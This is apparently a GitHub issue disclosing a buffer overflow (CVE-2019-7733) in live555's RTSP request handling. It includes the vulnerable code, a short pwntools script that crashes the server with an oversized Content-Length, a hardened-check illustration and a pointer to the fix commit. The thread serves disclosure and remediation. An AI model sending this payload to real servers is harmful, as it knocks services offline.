live555
There is a buffer overflow which can lead to DoS in live555 v0.95.
When parsing the request packet in the function handleRequestBytes, the code doesn't check the Content-Length and uses it in memmove. This finally causes the buffer overflow.
```cpp
// handleRequestBytes(): contentLength is taken from the parsed header as-is
unsigned requestSize = (fLastCRLF+4-fRequestBuffer) + contentLength;
numBytesRemaining = fRequestBytesAlreadySeen - requestSize; // unsigned subtraction
resetRequestBuffer(); // to prepare for any subsequent request
if (numBytesRemaining > 0) {
  memmove(fRequestBuffer, &fRequestBuffer[requestSize], numBytesRemaining);
  newBytesRead = numBytesRemaining;
}
```
There is a Content-Length check, but it only assigns parseSucceeded to False. This can't prevent the memmove.
```cpp
Boolean parseSucceeded = parseRTSPRequestString((char*)fRequestBuffer, fLastCRLF+2 - fRequestBuffer,
                                                cmdName, sizeof cmdName,
                                                urlPreSuffix, sizeof urlPreSuffix,
                                                urlSuffix, sizeof urlSuffix,
                                                cseq, sizeof cseq,
                                                sessionIdStr, sizeof sessionIdStr,
                                                contentLength);
fLastCRLF[2] = '\r'; // restore its value
// Check first for a bogus "Content-Length" value that would cause a pointer wraparound:
if (tmpPtr + 2 + contentLength < tmpPtr + 2) {
#ifdef DEBUG
  fprintf(stderr, "parseRTSPRequestString() returned a bogus \"Content-Length:\" value: 0x%x (%d)\n", contentLength, (int)contentLength);
#endif
  parseSucceeded = False;
}
```
I can make the server crash with a simple packet.
```python
from pwn import *

p1 = remote("IP", Port)  # placeholders for the target host and RTSP port
pl = "OPTIONS rtsp://10.113.214.93:8554/a.mkv RTSP/1.0\r\nCSeq: 1 \r\nUser-Agent: Lavf55.37.102\r\n"
pl += "Content-Length: 4294927296\r\n\r\n"  # oversized Content-Length
p1.send(pl)
```
This was assigned CVE-2019-7733.
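As an added illustration (not live555's code and not the upstream fix), the arithmetic from handleRequestBytes reduced to two functions: the unchecked form, evaluated with the Content-Length value from the report, and a hardened form that rejects a Content-Length larger than the request buffer and never subtracts past the bytes already received. The buffer size and the 100-byte header length are assumed values.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed request buffer size for this illustration (not taken from the page). */
#define REQUEST_BUFFER_SIZE 20000u

/* Arithmetic as shown in the report: requestSize is built from an unchecked
 * Content-Length and subtracted from the bytes seen. If requestSize is larger
 * than bytes_seen, the unsigned subtraction wraps and memmove would receive
 * that wrapped length together with an out-of-bounds source index. */
uint32_t remaining_unchecked(uint32_t header_len, uint32_t content_length,
                             uint32_t bytes_seen) {
    uint32_t request_size = header_len + content_length;
    return bytes_seen - request_size;
}

/* Hardened form (added here, not the project's fix): returns false whenever the
 * request must not be shifted with memmove, either because the declared body
 * cannot fit the buffer (reject) or because it has not fully arrived (wait). */
bool remaining_checked(uint32_t header_len, uint32_t content_length,
                       uint32_t bytes_seen, uint32_t *remaining) {
    *remaining = 0;
    if (header_len > REQUEST_BUFFER_SIZE ||
        content_length > REQUEST_BUFFER_SIZE - header_len)
        return false;                 /* bogus Content-Length: drop the request */
    uint32_t request_size = header_len + content_length;  /* cannot overflow now */
    if (request_size > bytes_seen)
        return false;                 /* body incomplete: keep reading, do not move */
    *remaining = bytes_seen - request_size;
    return true;
}

int main(void) {
    /* Constructed input: a 100-byte header and the Content-Length from the report. */
    uint32_t r;
    printf("unchecked: memmove length would be %u\n",
           remaining_unchecked(100, 4294927296u, 100));
    printf("checked: %s\n",
           remaining_checked(100, 4294927296u, 100, &r) ? "ok" : "rejected");
    return 0;
}
```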
This was addressed in 2019.05.12, please close.
http://www.live555.com/liveMedia/public/changelog.txt
Could you kindly point me to the commit that fixed the issue ? Thanks :)
@NicoleG25 As far as I recall: ef01f0a7db9d7a7660658d088e36c4c4d0d02e27, this line in particular https://github.com/rgaufman/live555/blob/master/liveMedia/RTSPServer.cpp#L717.